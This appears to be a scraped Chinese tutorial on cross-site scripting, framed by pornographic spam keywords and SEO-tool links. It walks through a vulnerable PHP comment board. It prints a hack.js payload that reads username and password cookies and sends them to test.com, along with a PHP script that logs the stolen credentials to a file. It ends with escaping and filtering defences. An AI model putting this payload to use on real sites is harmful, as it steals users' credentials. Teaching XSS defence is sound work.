丰满少妇理伦A片在线看,精品日产卡一卡二卡麻豆,天堂之囚在线观看,少妇富婆按摩偷人a片

  • 歡迎使用超級蜘蛛池(CJZZC)網(wǎng)站外鏈優(yōu)化,收藏快捷鍵 CTRL + D

推薦 跨站脚本攻击XSS是什么?


跨站腳本攻擊(Cross Site Script為了區(qū)別于CSS簡稱為XSS)指的是惡意攻擊者往Web頁面里插入惡意html代碼,當(dāng)用戶瀏覽該頁之時,嵌入其中Web里面的html代碼會被執(zhí)行,從而達到惡意用戶的特殊目的。 

當(dāng)在響應(yīng)頁面中返回用戶輸入的 JavaScript 代碼時,瀏覽器便會執(zhí)行該代碼。攻擊者往往利用該原理向網(wǎng)頁中插入惡意代碼,并生成惡意鏈接誘使用戶點擊。當(dāng)用戶點擊該連接時,便會生成對 Web 站點的請求,其中的參數(shù)值含有惡意的 JavaScript 代碼。

 如果 Web 站點將這個參數(shù)值嵌入在響應(yīng)的 HTML 頁面中(這正是站點問題的本質(zhì)所在),惡意代碼便會在用戶瀏覽器中運行,達到攻擊者的目的。

1.jpg

Web 站點中所包含的腳本直接將用戶在 HTML 頁面中的輸入(通常是參數(shù)值)返回,而不預(yù)先加以清理。 如果腳本在響應(yīng)頁面中返回由 JavaScript 代碼組成的輸入,瀏覽器便可以執(zhí)行此輸入。 因此,有可能形成指向站點的若干鏈接,且其中一個參數(shù)包含惡意的 JavaScript 代碼。 該代碼將在站點上下文中(由用戶瀏覽器)執(zhí)行,這使得該代碼有權(quán)訪問用戶在該站點中具有訪問權(quán)的 cookie,以及站點中其他可通過用戶瀏覽器訪問的窗口。

攻擊依照下列方式繼續(xù)進行:攻擊者誘惑合法用戶單擊攻擊者生成的鏈接。 用戶單擊該鏈接時,便會生成對于 Web 站點的請求,其中的參數(shù)值含有惡意的 JavaScript 代碼。 如果 Web 站點將這個參數(shù)值嵌入在響應(yīng)的 HTML 頁面中(這正是站點問題的本質(zhì)所在),惡意代碼便會在用戶瀏覽器中運行。

一個簡單的留言板

我們有個頁面用于允許用戶發(fā)表留言,然后在頁面底部顯示留言列表

<!DOCTYPE html>
   <html>
    <head>
    <?php include('/components/headerinclude.php');?></head>
    <style type="text/css">
        .comment-title{
            font-size:14px;
            margin: 6px 0px 2px 4px;
        }
        .comment-body{
            font-size: 14px;
            color:#ccc;
            font-style: italic;
            border-bottom: dashed 1px #ccc;
            margin: 4px;
        }
    </style>
    <script type="text/javascript" src="/js/cookies.js"></script>
       <body>
         <form method="post" action="list.php">
        <div style="margin:20px;">
            <div style="font-size:16px;font-weight:bold;">Your Comment</div>
            <div style="padding:6px;">
                Nick Name:
                <br/>
                <input name="name" type="text" style="width:300px;"/>
            </div>
            <div style="padding:6px;">
                Comment:
                <br/>
                <textarea name="comment" style="height:100px; width:300px;"></textarea>
            </div>
            <div style="padding-left:230px;">
                <input type="submit" value="POST" style="padding:4px 0px; width:80px;"/>
            </div>
            <div style="border-bottom:solid 1px #fff;margin-top:10px;">
                <div style="font-size:16px;font-weight:bold;">Comments</div>
            </div>
            <?php 
                require('/components/comments.php'); 
                if(!empty($_POST['name'])){
                    addElement($_POST['name'],$_POST['comment']);
                }
                renderComments();
            ?>
        </div>
         </form>
        </body>
   </html>

addElement()方法用于添加新的留言,而renderComments()方法用于展留言列表,網(wǎng)頁看起來是這樣的。

image

XSS

因為我們完全信任了用戶輸入,但有些別有用心的用戶會像這樣的輸入

image

這樣無論是誰訪問這個頁面的時候控制臺都會輸出“Hey you are a fool fish!”,如果這只是個惡意的小玩笑,有些人做的事情就不可愛了,有些用戶會利用這個漏洞竊取用戶信息、誘騙人打開惡意網(wǎng)站或者下載惡意程序等。

2.jpg

利用xss竊取用戶名密碼

當(dāng)然這個示例很簡單,幾乎攻擊不到任何網(wǎng)站,僅僅看看其原理。我們知道很多登陸界面都有記住用戶名、密碼的功能方便用戶下次登錄,有些網(wǎng)站是直接用明文記錄用戶名、密碼,惡意用戶注冊賬戶登錄后使用簡單工具查看cookie結(jié)構(gòu)名稱后,如果網(wǎng)站有xss漏洞,那么簡單的利用jsonp就可以獲取其它用戶的用戶名、密碼了。

惡意用戶會這么輸入

image

我們看看 http://test.com/hack.js 里藏了什么?

var username=CookieHelper.getCookie('username').value;
   var password=CookieHelper.getCookie('password').value;
   var script =document.createElement('script');
   script.src='http://test.com/index.php?username='+username+'&password='+password;
   document.body.appendChild(script);

幾句簡單的javascript,獲取cookie中的用戶名密碼,利用jsonp把向 http://test.com/index.php

發(fā)送了一個get請求

http://test.com/index.php

<?php
    if(!empty($_GET['password'])){
        $username=$_GET['username'];
        $password=$_GET['password'];
        $path=$_SERVER["DOCUMENT_ROOT"].'/password.txt';
        $fp=fopen($path,'a');
        flock($fp, LOCK_EX);
        fwrite($fp, "$username\t $password\r\n");
        flock($fp, LOCK_UN);
        fclose($fp);
    }
    ?>

這樣惡意用戶就把訪問留言板的用戶的信息竊取了

怎么預(yù)防

上面演示的是一個非常簡單的XSS攻擊,還有很多隱蔽的方式,但是其核心都是利用了腳本注入,因此我們解決辦法其實很簡單,不信賴用戶輸入,對特殊字符如”<”,”>”轉(zhuǎn)義,就可以從根本上防止這一問題,當(dāng)然很多解決方案都對XSS做了特定限制,如上面這中做法在ASP.NET中不幸不同,微軟validateRequest對表單提交自動做了XSS驗證。但防不勝防,總有些聰明的惡意用戶會到我們的網(wǎng)站搞破壞,對自己站點不放心可以看看這個XSS跨站測試代碼大全試試站點是否安全。

一、 過濾用戶輸入的內(nèi)容,檢查用戶輸入的內(nèi)容中是否有非法內(nèi)容。如<>(尖括號)、"(引號)、 '(單引號)、%(百分比符號)、;(分號)、()(括號)、&(& 符號)、+(加號)等。

二、嚴格控制輸出

可以利用下面這些函數(shù)對出現(xiàn)xss漏洞的參數(shù)進行過濾

1、htmlspecialchars() 函數(shù),用于轉(zhuǎn)義處理在頁面上顯示的文本。

2、htmlentities() 函數(shù),用于轉(zhuǎn)義處理在頁面上顯示的文本。

3、strip_tags() 函數(shù),過濾掉輸入、輸出里面的惡意標(biāo)簽。

4、header() 函數(shù),使用header("Content-type:application/json"); 用于控制 json 數(shù)據(jù)的頭部,不用于瀏覽。

5、urlencode() 函數(shù),用于輸出處理字符型參數(shù)帶入頁面鏈接中。

6、intval() 函數(shù)用于處理數(shù)值型參數(shù)輸出頁面中。

7、自定義函數(shù),在大多情況下,要使用一些常用的 html 標(biāo)簽,以美化頁面顯示,如留言、小紙條。那么在這樣的情況下,要采用白名單的方法使用合法的標(biāo)簽顯示,過濾掉非法的字符。

各語言示例:

PHP的htmlentities()或是htmlspecialchars()。

Python的cgi.escape()。

ASP的Server.HTMLEncode()。

ASP.NET的Server.HtmlEncode() 或功能更強的  Microsoft Anti-Cross Site Scripting Library

Java的xssprotect(Open Source Library)

Node.js的node-validator。

本文鏈接:http://www.hkass.cn/article/296.html

超級蜘蛛工具

  • 網(wǎng)站鏈接HTTP狀態(tài)批量檢測_在線批量檢測網(wǎng)站鏈接狀態(tài)_超級蜘蛛池
  • 百度關(guān)鍵詞排名查詢_網(wǎng)站關(guān)鍵詞排名批量查詢_超級蜘蛛池
  • 百度收錄查詢_在線百度收錄批量查詢_超級蜘蛛池
  • 域名IP地址批量查詢_在線批量查詢網(wǎng)站IP地址_超級蜘蛛池
  • 超級外鏈發(fā)布工具_在線免費批量發(fā)布SEO外鏈_超級蜘蛛池
  • 網(wǎng)頁蜘蛛模擬抓取測試工具_超級蜘蛛工具_超級蜘蛛池